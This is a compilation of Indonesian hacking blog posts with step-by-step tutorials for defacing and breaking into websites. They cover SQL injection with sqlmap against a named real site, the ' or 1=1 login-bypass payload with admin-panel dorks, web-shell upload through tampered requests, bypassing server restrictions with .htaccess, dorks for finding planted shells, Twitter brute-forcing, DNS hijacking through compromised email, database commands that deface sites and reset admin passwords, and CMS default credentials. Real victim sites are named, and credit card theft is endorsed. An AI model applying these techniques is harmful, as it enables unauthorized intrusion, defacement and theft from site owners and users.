Bypass Halaman Login Wordpress yang di Redirrect

Jadi ceritanya tadi iseng iseng dapet config masterweb ( server Indo ) , udah di symlink, udah masuk MySQL Interface, eh pas web nya mau di eksekusi ternyata halaman loginnya gak bisa diakses . Webnya pake Wordpress. Loginnya disembunyikan. Jadi setiap diakses wp-login.php selalu redirrect ke index.php . pas ditest /wp-admin/ url nya tetep , tapi tampilannya tetep tampilan index.php .

Problem nya gan .

Akhir nya gue berasumsi nih situs pasti pake plugins . Entah plugins apa nama nya .

Ane cari deh kolom active_plugins di wp_options.

Selanjut nya , karena ane gak tau plugins apa yang dipake, hapus aja value dari active_plugins . Semuanya !

Dan sekarang coba masuk ke wp-login.php . :D

JEBRETTTT !!!!

kebuka !



NB : cara ini hanya bisa dilakukan jika web tersebut mengguakan plugins, bukan settingan .htaccess .

Jadi saya sarankan buat para webmaster, jangan etrlalu mengandalkan plugins. Mending pakai .htaccess . Saya tau mungkin alasan kalian menggunakan plugins karena lebih simpel , gak ribet karena tinggal install . tapi kekurangannya, plugins terhubung dengan database . Jadi jika config nya kena, percuma plugins yang kalian pasang tidak akan berfungsi apa apa . ;)



Sekian dari saya, semoga bermanfaat .

Rumahweb Server ( rumahweb.com ) Bypass Config

Jadi ceritanya ane lagi iseng iseng tuh deface.  Nemu dah target vuln SQLi. Scan pake SQLMap gak tembus, eh pas tak coba Bypass SQL Login malah masuk . Sialan . Wkwkwkwkwk . Dah, berhasil upload backdoor, tamper data. Eh ternyata server rumahweb. Nih server indo lumayan bagus. Symlink gak bisa, config pake shell biasa juga gak bisa.



Ini penampakan pas ane coba pake shell k2ll33d buat nge config :

Padahal ini shell biasanya jadi alternatif terakhir kalo shell ane gak bisa nge config :v

Indishell pun cuma bisa bilang #akurapopo

Akhir nya iseng iseng ane coba cara yang ane dapet kalo gak salah dari tutor nya bang war0k . Entah lah , ane lupa. Ini file lama . Wakakakaka.

Berikut cara bypass nya .

Buat folder baru. Sebagai contoh ane buat folder fvcker .

buat file .htaccess di folder tersebut . Berikut isinya :

Options FollowSymLinks MultiViews Indexes ExecCGI



AddType application/x-httpd-cgi .cc



AddHandler cgi-script .cc

AddHandler cgi-script .cc



Lalu buat file dengan ekstensi .cc . Terserah namanya.

Script nta bisa ambil disini

pwnz.cc

chmod pwnz.cc  ke 755 .

Sekarang, jalankan fungsi eval di shell kalian untuk mendapatkan file etc/passwd nya .

Buka file pwnz.cc , masukkan isi dari etc/passwd yang kalian dapatkan tadi ke dalamnya . Klik get config !

Jika sudah... Buka folder /fvcker/ atau folder yang kalian buat di awal tadi .

you got it !!!!

Rumahweb Bypassed !!!

Mungkin cara ini bisa diterapkan untuk server server lain yang mirip dengan rumahweb .



Sekian dan semoga bermanfaat.

Bypass Disabled Functions on LiteSpeed Server

Iseng iseng nyoba nanem shell di web sendiri. Gak ngapa ngapain sih . Ngetes aja. Kebetulan pake server LitleSpeed. Nah, pada tau kan pasti Disabled Function nya banyak banget. Symlink gak bisa, config gak bisa, upload shell yang di encrypt gak bisa, dll.



Contohnya, liat ss dibawah ini :

Nah, itu bisa di bypass. Simpel kok.

Cukup kalian buat file .htacces di public_html dan isikan dengan kode berikut

<Files *.php>

  ForceType application/x-httpd-php4

</Files>



Refresh backdoor kalian dan..

Hahh...

Server bypassed. ;)



Simpel kan. Sekian dan semoga bermanfaat. :D

Tutorial Upload Shell Backdoor di Website Dengan Tamper Data

Kadang ada kalanya saat kita brhasil masuk ke sebuah admin page , kita tidak bisa mengupoad shell . Disitu hanya bisa mengupload file tertentu selain ekstensi.php , contoh jpg , gif, dll.

Oleh karena itu kita harus mengakali supaya file .php terupload . Salahsatunya adalah dengan tamper data

. Tamper data adalah addons gratis milik Mozilla Firefox.

Kalian bisa mengunduh nya disini

Download addons Tamper Data



Oke kita mulai ke tutorial.

Pertama , saya asumsikan kalian sudah menemukan form upload di sebuah web. Entah itu admin page atau apalah , namun tidak bisa uload file php.

NAh, kita rename file shell kita dengan nama shell.php.jpg .

Lalu klik start tamper , selanjutnya submit.

Kalo ada popup continue tampering ? klik saja tamper.

Nah, nanti akan muncul post parameter nya di sebelah kanan . Cari kata shell.php.jpg dan rename dengan shell.php lalu klik ok.

Nah, bakalan ada notif upload sukses.

Setelah itu tinggal cari lokasi shell nya dimana .

Done. Happy hacking =))



Selamat mencoba dan semoga bermanfaat.

Mass Password Cracking Using John The Ripper | Crack Hash Password dengan John The Ripper

Ya, kali ini saya mau share crack md5 hash password dengan John The Ripper. Udah lama sih punya. Biar blog tetep update aja makanya share ini . :D . Software ini tentu bermanfaat bagi yang suka main SQLi dan menemukan password yang di hash.

Tools ini tidak hanya mampu untuk memecahkan password MD5 . bisa MD4, SHA, SFS, LM , dll.

Kelebihan lain tools ini adalah kita bisa melakukan mass cracking . Artinya tidak cuma submit hash satu satu.  Langsung 1000 juga bisa karena kita akan menaruhnya di file.txt . Oke langsung saja ya.

Pertama, download dulu John The Ripper Password Cracker

Dalam tutorial ini saya letakkan tools nya di G:/Tools/john

Sehingga di folder john nanti ada dua folder lagi, run dan doc .



Defaultnya file ini sudah memiliki dictionary password sendiri di file password.lst . tapi kalo kalian ingin mencoba wordlist kalian sendiri bisa simpan di folder /run/ dengan format .txt .



Cara menggunakannya, siapkan wordlist dan list password yang ingin di hash di foder /run/ .

Untuk testing saja. Silahkan lihat gambar berikut.

saya membuat list password dengan nama p.txt serta list hash dengan nama u.txt

Format pemasukan list password yang akan di hash :

• passwordhash


• username:passwordhash

Jika kalian ingin memberi penomoran ya pisahkan dengan tanda titik dua ( : ) . contoh 1:0b909d567a737b73862a4fb446d49e9b



Sekarang saat nya eksekusi.

Buka john.exe nya . lewat cmd tentunya.

G:

cd\Tools\john\run

 Setelah itu , ketik john .

maka akan muncul list command yang bisa dipakai .

disitu sudah perintah perintahnya.

Buat yang belum jelas, untuk melakukan cracking password kita menggunakan command

john --wordlist=wordlist.txt hash.txt

atau kadang ada hash password yang karakteristik nya sama ,contoh nya jumlah karakter hash nya sama . Maka gunakan perintah .

john --wordlist=wordlist.txt --format=format-hash hash.txt

Berhubung di tutorial ini saya membuat file p.txt dan u.txt . Dan password yang akan saya hash adalah raw-md5 (md5 memiliki banyak kemiripan dengan banyak tipe hash) maka command nya

john --wordlist=p.txt --format=raw-md5 u.txt

Jika sukses maka akan muncul hasilnya :

Loaded 4 password hashes with no different salts (Raw MD5 [SSE2i 10x4x3])

sendy            (1)

ariani           (2)

sinka            (3)

juliani          (4)

guesses: 4  time: 0:00:00:00 DONE (Mon May 26 06:03:44 2014)  c/s: 79.60  trying

: sendy - ayu

Use the "--show" option to display all of the cracked passwords reliably



Bagaimana ? mudah kan ?

Selamat mencoba.

SQL Injection dengan bantuan SQLMAP - Hacking | Deface

Oke kali ini saya mau share tutorial SQL Injection dengan bantuan sqlmap. Tutor lama sih sebenarnya. Share aja barangkali ada yang kurang paham dengan tutor yang pernah dibaca maka ane mau share lagi dengan sejelas jelas nya.

Sebelum membaca tutor lebih lanjut , pastikan kalian yang pengguna windows sudah menginstall python.



Download python

Download Sqlmap



Setelah Python diinstall, unzip sqlmap nya . Ane sendiri meletakan nya di C:/tools/sqlmap . Silahkan sesuaikan sendiri.



Mulai mencari target yang vuln sqli. Pasti tau kan ? yang ketika diberi string tanda petik satu (') akan muncul error.

Saatnya eksekusi :v

Buka sqlmap nya.

run cmd , lalu ketik cd/tools/sqlmap <-- sesuaikan sendiri dimana kalian tadi meletakkan folder sqlmap nya.

setelah itu masukkan command sqlmap.py -u url_vuln --dbs

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 --dbs

nah, ketemu tuh nama database nya.

Lanjut ke command berikut nya

sqlmap.py -u url_vuln -D nama_database --tables

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data --tables

Nah muncul tuh table dalam database nya.

Lanjut ke command berikut nya :

sqlmap.py -u nama_site -D nama_database -T nama_table --columns

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser --columns <-- pilih nama table yang kira kira berisi password dan username nya.

Yosshhh.. muncul daftar column nya. Searang saat nya melihat isi dari user dan password.

sqlmap.py -u nama_site -Dnama_db -T nama_table -C nama_kolom --dump <-- jika kolom lebih darisatu pisahkan dengan tanda koma.

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser -C userid,password --dump

Nah, udah keliatan kan user sama pass nya. Kadang ada yang di hash tapi kalo beruntung ya tinggal login . Pass nya gak di hash.

Dorr !

Sekian tutorial kali ini . Semoga bermanfaat :)

Deface Ala Newbie dengan Dorking Shell Backdoor di Google

Oke jumpa lagi dengan saya setelah hampir satu bulan ini tidak posting karena berbagai kesibukan di dunia nyata . hehehe. Kali ini mau share seddikit trik deface ala newbie dengan dorking shell.

Biasa nya defacer memasang shell backdoor pada web yang dia deface. Sayangnya kadang yang dipakai adalah shell yang tidak berpassword dan terindex google sehingga kita dapat menemukan shell tersebut dengan dorking lewat google.



Oke kali ini ane mau share dork yang ampuh buat nyari shell di google.

Barangkali berguna bagi kalian yang masih penasaran dengan deface atau masih penasaran sama bentuk shell backdoor. :v



Dorking shell b374k m1n1

b374k m1n1 adalah shell favorit ane gan . Ringan dan simpel. Namun versi asli nya belum berpassword dan masih terindex google sehingga kita bisa menemukan shell yang sudah terpasang dengan google dork.



intitle:b374k m1n1 inurl:wp-content

Dorr !!

dork silahkan kembangkan sendiri.



Dorking Shell Madspot

Shell ini defaultnya tidak dipassword dan terindex google sehingga kita bisa dorking untuk menemukan shell ini.



intitle:Madspot Security site:br

Dorr !!

Dork silahkan dikembangkan sendiri.



Dorking Shell 1n73ct10n

Shell ini adalah hasil recode shell b374k yang cukup populer. Dikembangkan oleh bang x'1n73ct .

Namun kelemahannya shell ini masih terindex google. Defaultnya shell ini sudah diberi password, namun malah ada yang pass nya diilangin :v



intitle:1n73ct10n inurl:wp-content

dorr !

 Nah gimana ? keren kan ? :D

Shell lain yang terindex google : c99 , c100, r57 , Cyber Anarchy Shell .

Silahkan kembangkan lagi dork nya . ini bisa digunakan untuk semua shell yang masih terindex google . :)

Sekian dan selamat mencoba.

Hack Akun Twitter dengan BruteForce

Oke , kali ini saya mau share cara hack akun twitter dengan teknik bruteforce. Bruteforce loh ya, bukan sprite ular. wkwkwk :v .

Oke langsung saja ya daripada kelamaan intro :D

Bahan bahan :

Python [ buat yang pake windows. kalo udah di install ya skip ke langkah berikutnya]

Mechanize

Tools BruteForce [ simpan dengan filetype .py ]



Langkah Langkah :

1. Install Python , kalo ini gampang tinggal klik klik :v

2. Install Mechanize.

Caranya ,

1. ekstrak file .zip yang kalian download diatas. 


2. Untuk memudahkan ekstrak saja di dir C:


3. Lalu buka CMD , ketik cd/mechanize-0.2.5 (karena tadi ngekstrak file nya di direktori itu)


4. kalo sudah , ketik setup.py install . Tunggu proses install selesai.

3. Sekarang , tinggal simpan bahan yang ketiga yaitu tools nya . Terserah di direktori mana . penting formatnya .py . Sebagai contoh , ane simpen di C:/tools/ dengan nama sendy.py

4. Buka dengan CMD. cd/tools/ (karena tadi nyimpennya di tools)

5. lalu ketik sendy.py (nama file nya l3r ! )

6. nah, nanti disuruh masukin username twitter yang mau di anu anu, tekan enter. lalu disuruh masukin list password yang digunakan untuk bf nya.

7. List password harus satu folder dengan tools bruteforce nya. Misal ane simpen dengan nama akicha.txt

8. Tinggal tunggu proses bruteforce selesai. :)

Udah saya test. sampai artikel ini diterbitkan tools nya 100% work !!

Selamat mencoba.

salam crott

./nattasha

Command Untuk Edit / Modifikasi Database Lewat Shell b374k

Hallo... Kali ini saya mau share command atau perintah untuk mengedit database lewat shell b374k. Sebenarnya ini trik lama sih :) . Share aja buat yang belum tau .

Bagi yang suka main config, pasti lebih suka pake MySQL Interface by Mohajer22 . Nah , masalahnya beberapa server, termasuk masterweb , gak support sama MySQL jenis itu. Jadi meski kita memasukkan password dan username benar, kita tidak bisa masuk database nya. Tampilannya tetep di halaman muka saja meski url nya berubah :)

Oleh karena itu kita harus menggunakan MySQL Interface lain. Dan yang biasa saya gunakan adalah MySQL yang ada pada b374k m1n1.

Untuk yang belum punya bisa klik disini : Download b374k m1n1 WebShell

Masalahnya, kadang yang baru make MySQL jenis ini untuk pertamakalinya kebingungan. Itu juga yang saya alami dulu. Soalnya tidak ada tombol edit, delete dll. Cuma list table. Ya, MySQL Interface jenis ini harus menggunakan command. Comand nya dimasukkan di kotak atasnya. Sama sebenarnya  dengan cara edit database manual lewat phpmyadmin.

Ini command nya :

UPDATE prefix_table SET table_value = 'data yang ingin dimasukkan' WHERE nama_kolom = 'value'

Nggak tau deh itu pada mudeng apa enggak :v

Untuk lebih jelasnya lihat contoh berikut (ini di database wordpress)

Ane mau ngedit nama situs Wordpress. Nah , blogname kan ada di tabel wp_options, maka command nya :

UPDATE wp_options SET option_value = 'Hacked by Nabilaholic404 Hacked by Nabilaholic404' WHERE option_name = 'blogname'



Maka nama situs berubah menjadi Hacked by Nabilaholic404 Hacked by Nabilaholic404.

kalau mau ngubah blogdescription ya tinggal di WHERE option_name = 'blogdescription' .

Lihat gambar :

Nah, untuk mengedit tabel wp_users lebih gampang .

UPDATE wp_users SET user_pass=md5('password')



Untuk password tidak perlu di hash ke md5 . Cukup ketik kata biasa saja. Misal kita command

UPDATE wp_users SET user_pass=md5('nabilah')

maka password ti database otomatis terisi 6138f95a7e66e7373c8d770ad348d13c (hash dari password yang dimasukkan tadi = nabilah ) .



Sekian tutorial kali ini , semoga bermanfaat.

Simple Tutorial Hack Website dengan Teknik DNS Hijacking

Assalamualaikum...

Selamat siang semuanya :D

kali ini saya akan share Simple Tutorial Hack Website dengan Teknik DNS Hijacking. Oke langsung saja ya daripada kelamaan :v .

DNS Hijacking adalah teknik peretasan dengan mengubah DNS pada suatu website, yang menyebabkan ketika seseorang mengaksesnya, maka halaman yang ditampilkan adalah halaman deface milik si attacker / pelaku DNS Hijacking.



oke , step pertama adalah cek whois dari web target.

caranya, pergi ke www.who.is/whois/[situs target]

tujuan dari melihat whois ini adalah melihat data register dari domain tersebut.

yaitu dimana web tersebut didaftarkan dan alamat email yang digunakan untuk mendaftarkan domain tersebut.



Langkah kedua adalah hack email yang digunakan untuk mendaftarkan domain tersebut.

Kalo teknik hack email tentu saja butuh social engineering yang bagus. Untuk teknik social engineering bisa kalian cari refrensinya di google. bagi yang belum tau apa itu social engineering, bisa baca disini : apa itu Social Engineering ?



Langkah selanjutnya adalah login client di domain registry.

pada step pertama, kta tau dimana domain tersebut didaftarkan. nah, kita bisa login di register domain tersebut dengan email yang telah kita hack. jika bingung langsung saja reset password.



Next, ganti nameserver domain.

Setelah berhasil masuk ke panel domain, silahkan ganti ns domain dengan ns domain yang kita inginkan. Jika kalian punya WHM atau cPanel, arahkan saja ns nya ke WHM / cPanel kalian.



Langkah terakhir, buat akun domain di WHM kalian atau tambahkan domain yang ingin di hijack di addons domain jika kalian menggunakan cPanel.



Done, domain pasti terarah ke server baru yang telah kalian setting. Tinggal buat file index.php dan 404.php dengan script deface kalian.



Sekian tutorial kali ini, semoga bisa dipahami.

Tutorial Hack Website Dengan Bypass SQL Login

Oke, kali ini saya mau share tutorial SQLi Bypass Login :D . Dengan teknik ini, kita bisa login ke halaman admin suatu website tanpa perlu memasukkan user dan password yang dibuat oleh admin. Udah lama sih tutorial ini saya dapat :D . Baru sempet share aja . hehehe. Oke langsung saja ke tutorialnya :) .

Google Dork :



inurl:manager intitle:Admin Panel

inurl:/admin2/ ext:php

inurk:/admin/ ext:php

inurl:/adminpanel/ ext:php

inurl:/admin_panel/



Kembangin lagi dorknya ya :)



Langkah langkah :

Nah, kalo udah dapet salahsatu web nya, kita login dengan user dan password berikut :

user :  ' or 1=1 limit 1 -- -+

pass : ' or 1=1 limit 1 -- -+

Jika vuln, pasti masuk halaman admin kok :)

Gampang sekali bukan ?

Cara ini sebenarnya banyak manfaatnya. Selain buat yang hobi deface sana sini, yang mau cari credit card pakai cara ini juga terbukti ampuh :D



Tapi inget, dosa tanggung sendiri. ;)

Sekian tutorial kali ini . Terimakasih :)

Subgraph Vega Web Vulnerability Scanner

Vega adalah scanner gratis dan open source dan platform penetration test untuk menguji keamanan aplikasi web. Vega dapat membantu Anda menemukan dan memvalidasi SQL Injection, Cross-Site Scripting (XSS),  mengungkapkan informasi sensitif, dan kerentanan lainnya. Scanner ini ditulis dalam bahasa Java, yang berbasis GUI, dan dapat berjalan pada Linux, OS X, dan Windows.

Vega mencakup scanner otomatis untuk pengujian secara cepat dan memiliki fitur proxy dalam pemeriksaan taktis. Vega scanner dapat menemukan XSS (cross-site scripting), injeksi SQL, dan kerentanan lainnya. Vega dapat dikembangkan dengan menggunakan API dalam bahasa web: Javascript.

FETURES

Modules

• Cross Site Scripting (XSS)
• SQL Injection
• Directory Traversal
• URL Injection
• Error Detection
• File Uploads
• Sensitive Data Discovery

Core

• Automated Crawler and Vulnerability Scanner
• Consistent UI
• Website Crawler
• Intercepting Proxy
• SSL MITM
• Content Analysis
• Extensibility through a Powerful Javascript Module API
• Customizable alerts
• Database and Shared Data Model

Untuk menjalaankan scanner ini dibutuhkan aplikasi Java sebagai pendukung.

Java SE Development Kit 7u45 - Windows x86 | Download

Download Subgraph Vega Web Vulnerability Scanner :

• Mac OS X 32-bit Intel
• Mac OS X 64-bit Intel

• Linux GTK 32-bit Intel
• Linux GTK 64-bit Intel

• Microsoft Windows 32-bit (x86) JRE
• Microsoft Windows 64-bit JRE

Bypass Halaman Administrator Joomla yang di Redirect

Bypass Halaman Administrator Joomla yang di Redirect - Assalamualaikum..

Lama gak share tutorial lagi :D

Kali ini saya mau share tutorial bypass halaman administrator Joomla yang di Redirect.

Oke langsung saja ya :D

Kemarin ane dapet config web IKIP Budi Utomo Malang. Tapi pas ane cek halaman loginnya ternyata di redirect.

Jadi pas dibuka ikipbudiutomo.ac.id/administrator/ selalu diredirrect ke ikipbudiutomo.ac.id/

gak bisa login deh. :(

Untung inget temen ane pernah share cara bypass nya.

Ane anggep udah dapet confingnya. Jadi tinggal bypass.

Pertama, login ke MySQL Interface nya.

Karena ini Joomla, cari table jos_plugins .

Tergantung table prefix nya juga sih, defaultnya sih jos_ . Bisa juga jancuk_plugins dll :v

Nah, setelah sampai di dalem, cari plugins yang namanya System - jScure Authentication .

Kalo gak ada ya coba cari plugins lain yang sekiranya mencurigakan. :D

Kita nonaktifkan plugins tersebut. caranya gimana ?

Klik edit.

Buat nyari gampang aja, buat nilai "published" yang awalnya 1 menjadi 0 . Lalu save lagi.

Lalu coba akses ikipbudiutomo.ac.id/administrator/ .

w00t.... kebuka kan . :D

Kalo sudah begitu ya tinggal reset password lewat jos_user dengan hash md5, lalu login di halaman Administrator nya :D

Done.

Sekarang terserah mau diapakan.

Sekian tutorial dari saya, semoga bermanfaat :)

Tutorial Deface dengan Bug CMS Lokomedia

Sebelumnya ane kasih info kalau Lokomedia adalah CMS asli buatan Indonesia jadi kalau kalian nemu bug nya jangan diobrak abrik ya . Contact adminnya atau kalo bisa di patch ssekalian. :D

Sebenarnya ini bug lama sih. tapi jika kalian sabar dan beruntung tentunya, kalian tetap bisa mendapatkan target vuln dengan bug Lokomedia.

Ada banyak bug lokomedia. Ane jelasin satu satu.



Lokomedia Default Password .

Banyak admin admin situs yang tidak mengubah default password dari CMS Lokomedia.

caranya :

Masuk ke login adminnya di localhost/admin/ atau localhost/adminweb/

Dan berikut adalah daftar user serta password CMS Lokomedia

admin : admin

wiro : sableng

sinto : gendeng

joko : sembung



Bug Upload di CMS Lokomedia

nah, kalo yang ini, kadang script lama  lokomedia belum diupdate sama webmasternya sehingga kita bisa melakukan upload dari halaman admin tanpa login. ataupun kita bisa melakukan aksi add user .

Jika emmang bug nya add user, caranya adalah masuk ke

site/adminweb/content.php?module=user lalu tambahkan user serta password disitu.

Selanjutnya kalian bisa login di /adminweb/ atau /admin/ (tergantung letak halaman loginnya)



Lalu yang kedia adalah bug di modul download

site/adminweb/content.php?module=download . disitu kalian bisa upload shell kalian, dan letak file nya adalah di site/files/namashell.php .



Yang ketiga adalah bug di modul banner.

yaitu di site/adminweb/content.php?module=banner . kalian langsung saja tambahkan banner . letak shellnya ada di site/foto_banner/namashell.php .



Oke, kali ini ane nemu web dengan bug add banner di ikamesinits.org .

masuk ke http://www.ikamesinits.org/adminweb/content.php?module=banner

lalu klik "tambah Banner"

Setelah upload selesai kadang memang ada notice "anda harus login"

tapi coba kita lihat apa upload nya berhasil, cek di

http://www.ikamesinits.org/adminweb/content.php?module=banner

Berhasil kan ? :D

Akses shellnya di site/foto-banner/namashell.php

Karena ane tadi upload file sendy.php , maka file nya ada di

http://www.ikamesinits.org/foto_banner/sendy.php

Sekarang terserah kalian mau diapain tuh site :*

www.ikamesinits.org



Sekian dan jangan disalahgunakan :D

Use at Your Own Risk !!

Tutorial Deface Subdomain dari Afraid FreeDNS

Oke, sebenarnya ini sudah agak lama sih. Cuma baru di share sekarang soalnya baru kemarin tau nya :v . Oke langsung saja ya. :3

Pertama, harus login dulu di :

http://freedns.afraid.org/subdomain/

Kalo belum punya akun ya register dulu.

Kalo sudah login tampilannya kayak gini :

Langkah selanjutnya adalah masuk kesini

http://freedns.afraid.org/domain/registry/

nah, disitu banyak tuh domain yang bisa dibuat subdomain. tapi kalo mau narget, bisa juga paaki fitur pencarian.

nah tuh. Intinya cari yang statusnya "public"

Tinggal klik nama domainnya , lalu isi nama subdomain dan destination ip kamu.

Untuk destination, itu diisi dengan ip kemana kamu akan mengarahkan domain itu. Misal mau diarahkan ke WHM. Berhubung gak punya WHM, ane arahin aja ke cPanel.

 lalu "save"

 Step step di afraid sekarang sudah selesai.

Berhubung tadi ane pointing IP nya ke cPanel, selanjutnya adalah menambahkan domain tadi di cPanel. Hal itu gak usah dijesalin disini soalnya ane udah pernah sahre. Baca baca aja di sini :

Cara Memasang Dua Domain dalam Satu cPanel | Addon Domain



Kalo langkah yang kalian ikuti benar harusnya hasil akhirnya seperti ini :

http://forum.cyber48.net/

Mirror



Sekian tutorial kali ini, jangan disalahgunakan ya. ;)



Refrensi :

http://rebels-officials.info



NB : copas kasih sumber cuk !